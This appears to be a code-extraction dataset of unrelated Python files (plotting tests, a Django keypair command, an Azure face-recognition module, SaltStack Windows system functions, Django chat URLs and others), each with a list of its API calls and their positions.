'shutil.copyfile', 'shutil.copyfile', (['filename', 'best_filename'], {}), '(filename, best_filename)\n', (13142, 13167), False, 'import shutil\n'), ((13303, 13325), 'torch.load', 'torch.load', (['model_path'], {}), '(model_path)\n', (13313, 13325), False, 'import torch\n'), ((13630, 13650), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (13644, 13650), False, 'import os\n'), ((13660, 13674), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (13668, 13674), False, 'import os\n'), ((1149, 1172), 'os.listdir', 'os.listdir', (['floder_path'], {}), '(floder_path)\n', (1159, 1172), False, 'import os\n'), ((13775, 13804), 'os.path.join', 'os.path.join', (['path', '"""scripts"""'], {}), "(path, 'scripts')\n", (13787, 13804), False, 'import os\n'), ((13936, 13969), 'shutil.copyfile', 'shutil.copyfile', (['script', 'dst_file'], {}), '(script, dst_file)\n', (13951, 13969), False, 'import shutil\n'), ((1364, 1394), 'os.path.isdir', 'os.path.isdir', (['floder_path_one'], {}), '(floder_path_one)\n', (1377, 1394), False, 'import os\n'), ((13898, 13922), 'os.path.basename', 'os.path.basename', (['script'], {}), '(script)\n', (13914, 13922), False, 'import os\n'), ((1427, 1454), 'os.listdir', 'os.listdir', (['floder_path_one'], {}), '(floder_path_one)\n', (1437, 1454), False, 'import os\n'), ((1659, 1689), 'os.path.isdir', 'os.path.isdir', (['floder_path_two'], {}), '(floder_path_two)\n', (1672, 1689), False, 'import os\n'), ((1732, 1759), 'os.listdir', 'os.listdir', (['floder_path_two'], {}), '(floder_path_two)\n', (1742, 1759), False, 'import os\n')]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
*t4mon* - T4 monitoring **test functions** for gen_plot.py
"""
from __future__ import absolute_import
import six
import pandas as pd
from t4mon import df_tools, gen_plot
from matplotlib import pyplot as plt
from .base import TEST_DATAFRAME, BaseTestClass
class TestGenPlot(BaseTestClass):
""" Test functions for gen_plot.py """
def test_tobase64(self):
""" Test function for to_base64 """
plot_fig = TEST_DATAFRAME.plot()
self.assertIsInstance(gen_plot.to_base64(plot_fig), six.binary_type)
self.assertTrue(gen_plot.to_base64(plot_fig).
startswith(six.b('data:image/png;base64,')))
# Converting an empty plot, should return an empty string
self.assertEqual(gen_plot.to_base64(plt.figure().gca()), '')
def test_plotvar(self):
""" Test function for plot_var """
dataframe = df_tools.consolidate_data(self.test_data, system='SYSTEM1')
# make a plot filtering by system, uses dataframe.plot()
myplot = gen_plot.plot_var(dataframe,
'FRONTEND_11_OUTPUT_OK',
system='SYSTEM1',
logger=self.logger)
self.assertTrue(myplot.has_data())
self.assertTrue(myplot.is_figure_set())
# make a plot without filters, uses matplotlib.pyplot.plot()
myplot = gen_plot.plot_var(dataframe,
'FRONTEND_11_OUTPUT_OK',
logger=self.logger)
self.assertTrue(myplot.has_data())
self.assertTrue(myplot.is_figure_set())
# Selecting a non existing system should return an empty plot
voidplot = gen_plot.plot_var(dataframe,
'FRONTEND_11_OUTPUT_OK',
system='SYSTEM2',
logger=self.logger)
self.assertFalse(voidplot.has_data())
# now with an empty dataframe, should return None
voidplot = gen_plot.plot_var(pd.DataFrame(),
'DONTCARE',
logger=self.logger)
self.assertFalse(voidplot.has_data())
# same when trying to plot a non-existing variable
voidplot = gen_plot.plot_var(dataframe,
'DONTCARE',
logger=self.logger)
self.assertFalse(voidplot.has_data())
|
[
"t4mon.gen_plot.to_base64",
"pandas.DataFrame",
"t4mon.gen_plot.plot_var",
"matplotlib.pyplot.figure",
"t4mon.df_tools.consolidate_data",
"six.b"
] |
[((931, 990), 't4mon.df_tools.consolidate_data', 'df_tools.consolidate_data', (['self.test_data'], {'system': '"""SYSTEM1"""'}), "(self.test_data, system='SYSTEM1')\n", (956, 990), False, 'from t4mon import df_tools, gen_plot\n'), ((1073, 1168), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""FRONTEND_11_OUTPUT_OK"""'], {'system': '"""SYSTEM1"""', 'logger': 'self.logger'}), "(dataframe, 'FRONTEND_11_OUTPUT_OK', system='SYSTEM1',\n logger=self.logger)\n", (1090, 1168), False, 'from t4mon import df_tools, gen_plot\n'), ((1448, 1521), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""FRONTEND_11_OUTPUT_OK"""'], {'logger': 'self.logger'}), "(dataframe, 'FRONTEND_11_OUTPUT_OK', logger=self.logger)\n", (1465, 1521), False, 'from t4mon import df_tools, gen_plot\n'), ((1773, 1868), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""FRONTEND_11_OUTPUT_OK"""'], {'system': '"""SYSTEM2"""', 'logger': 'self.logger'}), "(dataframe, 'FRONTEND_11_OUTPUT_OK', system='SYSTEM2',\n logger=self.logger)\n", (1790, 1868), False, 'from t4mon import df_tools, gen_plot\n'), ((2365, 2425), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""DONTCARE"""'], {'logger': 'self.logger'}), "(dataframe, 'DONTCARE', logger=self.logger)\n", (2382, 2425), False, 'from t4mon import df_tools, gen_plot\n'), ((534, 562), 't4mon.gen_plot.to_base64', 'gen_plot.to_base64', (['plot_fig'], {}), '(plot_fig)\n', (552, 562), False, 'from t4mon import df_tools, gen_plot\n'), ((2118, 2132), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2130, 2132), True, 'import pandas as pd\n'), ((670, 701), 'six.b', 'six.b', (['"""data:image/png;base64,"""'], {}), "('data:image/png;base64,')\n", (675, 701), False, 'import six\n'), ((605, 633), 't4mon.gen_plot.to_base64', 'gen_plot.to_base64', (['plot_fig'], {}), '(plot_fig)\n', (623, 633), False, 'from t4mon import df_tools, gen_plot\n'), ((814, 826), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (824, 826), True, 'from matplotlib import pyplot as plt\n')]
|
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.db import IntegrityError
from base64 import b64encode
import ed25519
import sys
class Command(BaseCommand):
help = 'Manage Drawpile External Authentication'
#def add_arguments(self, parser):
#parser.add_argument('action', type=str)
def handle(self, *args, **kwargs):
self.make_keypair()
#if kwargs['action'] == 'make_keypair':
# self.make_keypair()
#else:
# raise CommandError("Unsupported action")
def make_keypair(self):
priv, pub = ed25519.create_keypair()
print (r"""# Ext auth key pair. Place this in local_settings.py
DRAWPILE_EXT_AUTH = {{
'PRIVATE_KEY': b64decode({priv}),
'PUBLIC_KEY': {pub},
}}""".format(
priv=b64encode(priv.to_bytes()),
pub=b64encode(pub.to_bytes())
))
|
[
"ed25519.create_keypair"
] |
[((632, 656), 'ed25519.create_keypair', 'ed25519.create_keypair', ([], {}), '()\n', (654, 656), False, 'import ed25519\n')]
|
"""Test for field definitions issue"""
# pylint: disable=unused-argument
import pytest
from widgetastic.widget import TextInput
from testsuite.ui.views.admin.audience.account_user import AccountUserEditView, AccountUserDetailView
from testsuite.ui.views.admin.audience.fields_definitions import FieldsDefinitionsCreateView
@pytest.fixture
def fields_definitions(login, navigator, threescale):
"""Create custom field definition"""
page = navigator.navigate(FieldsDefinitionsCreateView)
page.create_definition("custom_field", "Contact Name")
definition = [x for x in threescale.fields_definitions.list() if x["name"] == "custom_field"][0]
yield definition
threescale.fields_definitions.delete(definition.entity_id)
@pytest.mark.xfail
@pytest.mark.disruptive
@pytest.mark.issue("https://issues.redhat.com/browse/THREESCALE-7955")
def test_field_definitions(fields_definitions, account, navigator, browser):
"""
Preparation:
- Create custom field definition
Test:
- navigate to AccountUserEditView
- edit custom field
- navigate to AccountUserDetailView
- assert that custom field is displayed and correctly edited
"""
user = account.users.list()[0]
user_edit = navigator.navigate(AccountUserEditView, account=account, user=user)
field = TextInput(browser, id='user_extra_fields_custom_field')
field.fill('anything')
user_edit.update_button.click()
navigator.navigate(AccountUserDetailView, account=account, user=user)
assert browser.element(".//th[contains(text(),'Contact Name')]").is_displayed()
assert browser.element(".//td[contains(text(),'anything')]").is_displayed()
|
[
"pytest.mark.issue",
"widgetastic.widget.TextInput"
] |
[((786, 855), 'pytest.mark.issue', 'pytest.mark.issue', (['"""https://issues.redhat.com/browse/THREESCALE-7955"""'], {}), "('https://issues.redhat.com/browse/THREESCALE-7955')\n", (803, 855), False, 'import pytest\n'), ((1331, 1386), 'widgetastic.widget.TextInput', 'TextInput', (['browser'], {'id': '"""user_extra_fields_custom_field"""'}), "(browser, id='user_extra_fields_custom_field')\n", (1340, 1386), False, 'from widgetastic.widget import TextInput\n')]
|
#!/usr/bin/env python
from main import setup_logging
from flotilla.cli import cli
if __name__ == '__main__':
setup_logging()
cli()
|
[
"flotilla.cli.cli",
"main.setup_logging"
] |
[((115, 130), 'main.setup_logging', 'setup_logging', ([], {}), '()\n', (128, 130), False, 'from main import setup_logging\n'), ((135, 140), 'flotilla.cli.cli', 'cli', ([], {}), '()\n', (138, 140), False, 'from flotilla.cli import cli\n')]
|
import global_vars
import os
def heuristic_value(board,pred):
return manhattan_distance(board) + distance_from_start(board,pred)
#self explanatory
def distance_from_start(board,pred):
distance = 0
while to_tuple(board) != global_vars.start:
board = pred[to_tuple(board)][0]
distance+=1
return distance
#calcutes and retruns manhattan distance between of board from goal
def manhattan_distance(board):
goal = global_vars.start_1d
board = to_1d_list(board)
return sum(abs(board_index//3 - goal_index//3) + abs(board_index%3 - goal_index%3)
for board_index, goal_index in ((board.index(i), i) for i in range(1, 9)))
#converts a board to a one-dimensional list
def to_1d_list(board):
x = []
for i in board:
for j in i:
x.append(j)
return x
# converts given config ex. 1,2,3,...,8 and turns it into a 2 by 2 list board
def getValues(args):
temp = []
for i in args.split(","):
temp.append(ord(i) - 48)
temp = [temp[0:3], temp[3:6], temp[6:9]]
return temp
# conver a board to LIST and return it
def to_list(board):
result = []
for i in board:
result.append(list(i))
return result
# conver a board to TUPLE and return it
def to_tuple(board):
result = []
for i in board:
result.append(tuple(i))
return tuple(result)
# return True if the state represented by obj is sovlable, and false if it's not
def solvable(obj):
temp = []
for i in obj.board:
temp+=i
temp.remove(0)
inversions = 0
# Count number of inversions
for index, i in enumerate(temp):
for j in range(index+1, 8):
if(i > temp[j]):
inversions+=1
# print("Inversions : {}".format(inversions))
if(inversions%2 == 1):
return False
return True
# returns a copy to a given board
def copyBoard(board):
x = []
for i in board:
sub = []
for j in i:
sub.append(j)
x.append(sub)
return x
def clear_scr():
os.system('cls' if os.name == 'nt' else 'clear') #clear the screen for windows and linux
|
[
"os.system"
] |
[((2062, 2110), 'os.system', 'os.system', (["('cls' if os.name == 'nt' else 'clear')"], {}), "('cls' if os.name == 'nt' else 'clear')\n", (2071, 2110), False, 'import os\n')]
|
#
from modules import ilmodule
import requests
import os
import time
import pickledb
import globals
class FaceFinder(ilmodule.ILModule):
def __init__(self):
super().__init__()
self.people_db = "g:\Projects\imagelib_github\db\people.pdb"
self.db = pickledb.load(self.people_db, False)
self.face_api_url_prefix = (
"https://northeurope.api.cognitive.microsoft.com/face/v1.0"
)
self.face_api_service_key = os.environ["AZURE_SERVICE_FACE_API_KEY"]
self.person_group = "ourfaces"
self.getMessageBus().subscribe(self.onMessage, globals.TOPIC_FIND_FACE)
def onMessage(self, arg):
self.getLogger().debug("Received message: " + str(arg))
# Prevent too many requests to the API
self.getLogger().debug(
"Prevent too many requests to the API. Waiting for 2 seconds..."
)
time.sleep(2)
self.findFacesOnPicture(arg)
def extractFileName(self, filePath):
return os.path.basename(filePath)
def findFacesOnPicture(self, image_data):
sourceFile = image_data["image_path"]
self.getLogger().info("Finding faces on picture: " + str(sourceFile))
self.getLogger().debug("Using people database from: " + self.people_db)
face_detect_url = self.face_api_url_prefix + "/detect"
# No "targetFace" means there is only one face detected in the entire image !
face_identify_url = self.face_api_url_prefix + "/identify"
params = {"returnFaceId": "true"}
facesOnPicture = []
# Default empty "placeholder"...
image_data["faces"] = facesOnPicture
try:
data = self.getImageData(sourceFile)
headers = {
"Content-Type": "application/octet-stream",
"Ocp-Apim-Subscription-Key": self.face_api_service_key,
}
params = {"returnFaceId": "true", "returnFaceLandmarks": "true"}
response = requests.post(
face_detect_url, params=params, headers=headers, data=data
)
faceIds = []
if response.status_code == self.HTTP_OK:
faces = response.json()
for f in faces:
faceIds.append(f["faceId"])
self.getLogger().debug("Faces on picture:" + str(faceIds))
else:
self.getLogger().error("Error finding faces! " + response.text)
time.sleep(1)
#
#
if len(faceIds) > 0:
headers = {
"Content-Type": "application/json",
"Ocp-Apim-Subscription-Key": self.face_api_service_key,
}
r = requests.post(
face_identify_url,
headers=headers,
json={
"personGroupId": self.person_group,
"faceIds": faceIds,
"maxNumOfCandidatesReturned": "1",
"confidenceThreshold": "0.5",
},
)
if r.status_code == self.HTTP_OK:
self.getLogger().debug("Some face(s) identified.")
identifiedFaces = r.json()
for idf in identifiedFaces:
for candidate in idf["candidates"]:
self.getLogger().debug(
"Detected: " + self.db.get(candidate["personId"])
)
facesOnPicture.append(self.db.get(candidate["personId"]))
image_data["faces"] = facesOnPicture
else:
self.getLogger().error("Error response code: " + str(r.status_code))
self.getLogger().error(r.text)
else:
self.getLogger().warning("No faces on photo.")
except Exception as e:
self.getLogger().error("Error: " + str(e))
finally:
self.cleanupTmp()
self.getMessageBus().sendMessage(
globals.TOPIC_DESCRIBE_IMAGE, arg=image_data
)
|
[
"requests.post",
"os.path.basename",
"pickledb.load",
"time.sleep"
] |
[((278, 314), 'pickledb.load', 'pickledb.load', (['self.people_db', '(False)'], {}), '(self.people_db, False)\n', (291, 314), False, 'import pickledb\n'), ((901, 914), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (911, 914), False, 'import time\n'), ((1009, 1035), 'os.path.basename', 'os.path.basename', (['filePath'], {}), '(filePath)\n', (1025, 1035), False, 'import os\n'), ((1997, 2070), 'requests.post', 'requests.post', (['face_detect_url'], {'params': 'params', 'headers': 'headers', 'data': 'data'}), '(face_detect_url, params=params, headers=headers, data=data)\n', (2010, 2070), False, 'import requests\n'), ((2485, 2498), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2495, 2498), False, 'import time\n'), ((2759, 2944), 'requests.post', 'requests.post', (['face_identify_url'], {'headers': 'headers', 'json': "{'personGroupId': self.person_group, 'faceIds': faceIds,\n 'maxNumOfCandidatesReturned': '1', 'confidenceThreshold': '0.5'}"}), "(face_identify_url, headers=headers, json={'personGroupId':\n self.person_group, 'faceIds': faceIds, 'maxNumOfCandidatesReturned':\n '1', 'confidenceThreshold': '0.5'})\n", (2772, 2944), False, 'import requests\n')]
|
"""Like source.py, but uses streams."""
from __future__ import print_function
import argparse
import sys
from trollius import *
from trollius import test_utils
ARGS = argparse.ArgumentParser(description="TCP data sink example.")
ARGS.add_argument(
'--tls', action='store_true', dest='tls',
default=False, help='Use TLS')
ARGS.add_argument(
'--iocp', action='store_true', dest='iocp',
default=False, help='Use IOCP event loop (Windows only)')
ARGS.add_argument(
'--stop', action='store_true', dest='stop',
default=False, help='Stop the server by sending it b"stop" as data')
ARGS.add_argument(
'--host', action='store', dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action='store', dest='port',
default=1111, type=int, help='Port number')
ARGS.add_argument(
'--size', action='store', dest='size',
default=16*1024, type=int, help='Data size')
class Debug:
"""A clever little class that suppresses repetitive messages."""
overwriting = False
label = 'stream1:'
def print_(self, *args):
if self.overwriting:
print(file=sys.stderr)
self.overwriting = 0
print(self.label, *args, file=sys.stderr)
def oprint(self, *args):
self.overwriting += 1
end = '\n'
if self.overwriting >= 3:
if self.overwriting == 3:
print(self.label, '[...]', file=sys.stderr)
end = '\r'
print(self.label, *args, file=sys.stderr, end=end)
sys.stdout.flush()
@coroutine
def start(loop, args):
d = Debug()
total = 0
sslctx = None
if args.tls:
d.print_('using dummy SSLContext')
sslctx = test_utils.dummy_ssl_context()
r, w = yield From(open_connection(args.host, args.port, ssl=sslctx))
d.print_('r =', r)
d.print_('w =', w)
if args.stop:
w.write(b'stop')
w.close()
else:
size = args.size
data = b'x'*size
try:
while True:
total += size
d.oprint('writing', size, 'bytes; total', total)
w.write(data)
f = w.drain()
if f:
d.print_('pausing')
yield From(f)
except (ConnectionResetError, BrokenPipeError) as exc:
d.print_('caught', repr(exc))
def main():
global args
args = ARGS.parse_args()
if args.iocp:
from trollius.windows_events import ProactorEventLoop
loop = ProactorEventLoop()
set_event_loop(loop)
else:
loop = get_event_loop()
try:
loop.run_until_complete(start(loop, args))
finally:
loop.close()
if __name__ == '__main__':
main()
|
[
"trollius.windows_events.ProactorEventLoop",
"sys.stdout.flush",
"argparse.ArgumentParser",
"trollius.test_utils.dummy_ssl_context"
] |
[((170, 231), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""TCP data sink example."""'}), "(description='TCP data sink example.')\n", (193, 231), False, 'import argparse\n'), ((1537, 1555), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1553, 1555), False, 'import sys\n'), ((1717, 1747), 'trollius.test_utils.dummy_ssl_context', 'test_utils.dummy_ssl_context', ([], {}), '()\n', (1745, 1747), False, 'from trollius import test_utils\n'), ((2535, 2554), 'trollius.windows_events.ProactorEventLoop', 'ProactorEventLoop', ([], {}), '()\n', (2552, 2554), False, 'from trollius.windows_events import ProactorEventLoop\n')]
|
# coding: utf-8
import pprint
import re
import six
class AgreeTenantAuthorizationV2Req:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'auth_detail_list': 'list[TenantAgreeAuthDetailV2]',
'auth_effective_time': 'int',
'auth_expire_time': 'int',
'group_id': 'str',
'agency_id': 'str'
}
attribute_map = {
'auth_detail_list': 'auth_detail_list',
'auth_effective_time': 'auth_effective_time',
'auth_expire_time': 'auth_expire_time',
'group_id': 'group_id',
'agency_id': 'agency_id'
}
def __init__(self, auth_detail_list=None, auth_effective_time=None, auth_expire_time=None, group_id=None, agency_id=None):
"""AgreeTenantAuthorizationV2Req - a model defined in huaweicloud sdk"""
self._auth_detail_list = None
self._auth_effective_time = None
self._auth_expire_time = None
self._group_id = None
self._agency_id = None
self.discriminator = None
if auth_detail_list is not None:
self.auth_detail_list = auth_detail_list
if auth_effective_time is not None:
self.auth_effective_time = auth_effective_time
if auth_expire_time is not None:
self.auth_expire_time = auth_expire_time
if group_id is not None:
self.group_id = group_id
if agency_id is not None:
self.agency_id = agency_id
@property
def auth_detail_list(self):
"""Gets the auth_detail_list of this AgreeTenantAuthorizationV2Req.
授权详情列表
:return: The auth_detail_list of this AgreeTenantAuthorizationV2Req.
:rtype: list[TenantAgreeAuthDetailV2]
"""
return self._auth_detail_list
@auth_detail_list.setter
def auth_detail_list(self, auth_detail_list):
"""Sets the auth_detail_list of this AgreeTenantAuthorizationV2Req.
授权详情列表
:param auth_detail_list: The auth_detail_list of this AgreeTenantAuthorizationV2Req.
:type: list[TenantAgreeAuthDetailV2]
"""
self._auth_detail_list = auth_detail_list
@property
def auth_effective_time(self):
"""Gets the auth_effective_time of this AgreeTenantAuthorizationV2Req.
授权生效时间
:return: The auth_effective_time of this AgreeTenantAuthorizationV2Req.
:rtype: int
"""
return self._auth_effective_time
@auth_effective_time.setter
def auth_effective_time(self, auth_effective_time):
"""Sets the auth_effective_time of this AgreeTenantAuthorizationV2Req.
授权生效时间
:param auth_effective_time: The auth_effective_time of this AgreeTenantAuthorizationV2Req.
:type: int
"""
self._auth_effective_time = auth_effective_time
@property
def auth_expire_time(self):
"""Gets the auth_expire_time of this AgreeTenantAuthorizationV2Req.
授权到期时间
:return: The auth_expire_time of this AgreeTenantAuthorizationV2Req.
:rtype: int
"""
return self._auth_expire_time
@auth_expire_time.setter
def auth_expire_time(self, auth_expire_time):
"""Sets the auth_expire_time of this AgreeTenantAuthorizationV2Req.
授权到期时间
:param auth_expire_time: The auth_expire_time of this AgreeTenantAuthorizationV2Req.
:type: int
"""
self._auth_expire_time = auth_expire_time
@property
def group_id(self):
"""Gets the group_id of this AgreeTenantAuthorizationV2Req.
组id
:return: The group_id of this AgreeTenantAuthorizationV2Req.
:rtype: str
"""
return self._group_id
@group_id.setter
def group_id(self, group_id):
"""Sets the group_id of this AgreeTenantAuthorizationV2Req.
组id
:param group_id: The group_id of this AgreeTenantAuthorizationV2Req.
:type: str
"""
self._group_id = group_id
@property
def agency_id(self):
"""Gets the agency_id of this AgreeTenantAuthorizationV2Req.
委托id
:return: The agency_id of this AgreeTenantAuthorizationV2Req.
:rtype: str
"""
return self._agency_id
@agency_id.setter
def agency_id(self, agency_id):
"""Sets the agency_id of this AgreeTenantAuthorizationV2Req.
委托id
:param agency_id: The agency_id of this AgreeTenantAuthorizationV2Req.
:type: str
"""
self._agency_id = agency_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AgreeTenantAuthorizationV2Req):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"six.iteritems"
] |
[((4917, 4950), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (4930, 4950), False, 'import six\n')]
|
# -*- coding: utf-8 -*-
'''
Support for reboot, shutdown, etc
'''
# Import python libs
import logging
import re
# Import salt libs
import salt.utils
# Set up logging
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'system'
def __virtual__():
'''
This only supports Windows
'''
if not salt.utils.is_windows():
return False
return __virtualname__
def halt(timeout=5):
'''
Halt a running system
CLI Example:
.. code-block:: bash
salt '*' system.halt
'''
return shutdown(timeout)
def init(runlevel):
'''
Change the system runlevel on sysV compatible systems
CLI Example:
.. code-block:: bash
salt '*' system.init 3
'''
#cmd = 'init {0}'.format(runlevel)
#ret = __salt__['cmd.run'](cmd)
#return ret
# TODO: Create a mapping of runlevels to
# corresponding Windows actions
return 'Not implemented on Windows at this time.'
def poweroff(timeout=5):
'''
Poweroff a running system
CLI Example:
.. code-block:: bash
salt '*' system.poweroff
'''
return shutdown(timeout)
def reboot(timeout=5):
'''
Reboot the system
CLI Example:
.. code-block:: bash
salt '*' system.reboot
'''
cmd = 'shutdown /r /t {0}'.format(timeout)
ret = __salt__['cmd.run'](cmd)
return ret
def shutdown(timeout=5):
'''
Shutdown a running system
CLI Example:
.. code-block:: bash
salt '*' system.shutdown
'''
cmd = 'shutdown /s /t {0}'.format(timeout)
ret = __salt__['cmd.run'](cmd)
return ret
def shutdown_hard():
'''
Shutdown a running system with no timeout or warning
CLI Example:
.. code-block:: bash
salt '*' system.shutdown_hard
'''
cmd = 'shutdown /p /f'
ret = __salt__['cmd.run'](cmd)
return ret
def set_computer_name(name):
'''
Set the Windows computer name
CLI Example:
.. code-block:: bash
salt 'minion-id' system.set_computer_name 'DavesComputer'
'''
cmd = ('wmic computersystem where name="%COMPUTERNAME%"'
' call rename name="{0}"')
log.debug('Attempting to change computer name. Cmd is: '.format(cmd))
ret = __salt__['cmd.run'](cmd.format(name))
if 'ReturnValue = 0;' in ret:
ret = {'Computer Name': {'Current': get_computer_name()}}
pending = get_pending_computer_name()
if pending not in (None, False):
ret['Computer Name']['Pending'] = pending
return ret
return False
def get_pending_computer_name():
'''
Get a pending computer name. If the computer name has been changed, and the
change is pending a system reboot, this function will return the pending
computer name. Otherwise, ``None`` will be returned. If there was an error
retrieving the pending computer name, ``False`` will be returned, and an
error message will be logged to the minion log.
CLI Example:
.. code-block:: bash
salt 'minion-id' system.get_pending_computer_name
'''
current = get_computer_name()
cmd = ('reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control'
'\\ComputerName\\ComputerName /v ComputerName')
output = __salt__['cmd.run'](cmd)
pending = None
for line in output.splitlines():
try:
pending = re.search(
r'ComputerName\s+REG_SZ\s+(\S+)',
line
).group(1)
break
except AttributeError:
continue
if pending is not None:
return pending if pending != current else None
log.error('Unable to retrieve pending computer name using the '
'following command: {0}'.format(cmd))
return False
def get_computer_name():
'''
Get the Windows computer name
CLI Example:
.. code-block:: bash
salt 'minion-id' system.get_computer_name
'''
cmd = 'net config server'
lines = __salt__['cmd.run'](cmd).splitlines()
for line in lines:
if 'Server Name' in line:
_, srv_name = line.split('Server Name', 1)
return srv_name.strip().lstrip('\\')
return False
def set_computer_desc(desc):
'''
Set the Windows computer description
CLI Example:
.. code-block:: bash
salt 'minion-id' system.set_computer_desc 'This computer belongs to Dave!'
'''
cmd = 'net config server /srvcomment:"{0}"'.format(desc)
__salt__['cmd.run'](cmd)
return {'Computer Description': get_computer_desc()}
set_computer_description = set_computer_desc
def get_computer_desc():
'''
Get the Windows computer description
CLI Example:
.. code-block:: bash
salt 'minion-id' system.get_computer_desc
'''
cmd = 'net config server'
lines = __salt__['cmd.run'](cmd).splitlines()
for line in lines:
if 'Server Comment' in line:
_, desc = line.split('Server Comment', 1)
return desc.strip()
return False
get_computer_description = get_computer_desc
def join_domain(domain, username, passwd, ou, acct_exists=False,):
'''
Join a computer the an Active Directory domain
CLI Example:
.. code-block:: bash
salt 'minion-id' system.join_domain 'mydomain.local' 'myusername' \
'<PASSWORD>' 'OU=MyClients;OU=MyOrg;DC=myDom;DC=local'
'''
FJoinOptions = 3
if acct_exists:
FJoinOptions = 1
cmd = ('wmic /interactive:off ComputerSystem Where '
'name="%computername%" call JoinDomainOrWorkgroup FJoinOptions={0} '
'Name="{1}" UserName="{2}" Password="{3}" '
'AccountOU="{4}"'
).format(FJoinOptions, domain, username, passwd, ou)
ret = __salt__['cmd.run'](cmd)
if 'ReturnValue = 0;' in ret:
return {'Domain': domain}
return False
def get_system_time():
'''
Get the Windows system time
CLI Example:
.. code-block:: bash
salt '*' system.get_system_time
'''
cmd = 'time /T'
return __salt__['cmd.run'](cmd)
def set_system_time(newtime):
'''
Set the Windows system time
CLI Example:
.. code-block:: bash
salt '*' system.set_system_time '11:31:15 AM'
'''
cmd = 'time {0}'.format(newtime)
return not __salt__['cmd.retcode'](cmd)
def get_system_date():
'''
Get the Windows system date
CLI Example:
.. code-block:: bash
salt '*' system.get_system_date
'''
cmd = 'date /T'
return __salt__['cmd.run'](cmd)
def set_system_date(newdate):
'''
Set the Windows system date. Use <mm-dd-yy> format for the date.
CLI Example:
.. code-block:: bash
salt '*' system.set_system_date '03-28-13'
'''
cmd = 'date {0}'.format(newdate)
return not __salt__['cmd.retcode'](cmd)
def start_time_service():
'''
Start the Windows time service
CLI Example:
.. code-block:: bash
salt '*' system.start_time_service
'''
return __salt__['service.start']('w32time')
def stop_time_service():
'''
Stop the Windows time service
CLI Example:
.. code-block:: bash
salt '*' system.stop_time_service
'''
return __salt__['service.stop']('w32time')
|
[
"re.search",
"logging.getLogger"
] |
[((175, 202), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (192, 202), False, 'import logging\n'), ((3421, 3472), 're.search', 're.search', (['"""ComputerName\\\\s+REG_SZ\\\\s+(\\\\S+)"""', 'line'], {}), "('ComputerName\\\\s+REG_SZ\\\\s+(\\\\S+)', line)\n", (3430, 3472), False, 'import re\n')]
|
import subprocess
def get_diff(path):
if not path.startswith("/"):
path = "/" + path
result = subprocess.run(
["git", "-C", path, "diff", "--staged"], capture_output=True, encoding="utf8"
)
return result.stdout
|
[
"subprocess.run"
] |
[((113, 210), 'subprocess.run', 'subprocess.run', (["['git', '-C', path, 'diff', '--staged']"], {'capture_output': '(True)', 'encoding': '"""utf8"""'}), "(['git', '-C', path, 'diff', '--staged'], capture_output=True,\n encoding='utf8')\n", (127, 210), False, 'import subprocess\n')]
|
from rest_framework import routers
from .views import ChatViewSet
from .views import TalkViewSet
from . import views
from django.urls import path
chat_router = routers.DefaultRouter()
chat_router.register(r'', ChatViewSet)
talk_router = routers.DefaultRouter()
talk_router.register(r'', TalkViewSet)
app_name = 'chat'
urlpatterns = [
path('search_chat', views.search_chat, name='search_chat'),
path('fetch_my_chat', views.fetch_my_chat, name='fetch_my_chat'),
path('fetch_latest_talk', views.fetch_latest_talk, name='fetch_latest_talk'),
path('fetch_all_talk', views.fetch_all_talk, name='fetch_all_talk'),
path('fetch_chat_with_user_id', views.fetch_chat_with_user_id, name='fetch_chat_with_user_id'),
path('post_talk', views.post_talk, name='post_talk'),
path('fetch_chat_unread_total_count/', views.fetch_chat_unread_total_count, name='fetch_chat_unread_total_count'),
path('reset_chat_unread_count', views.reset_chat_unread_count, name='reset_chat_unread_count'),
path('fetch_chat_list_for_chat_list_page',
views.fetch_chat_list_for_chat_list_page,
name='fetch_chat_list_for_chat_list_page'),
]
|
[
"django.urls.path",
"rest_framework.routers.DefaultRouter"
] |
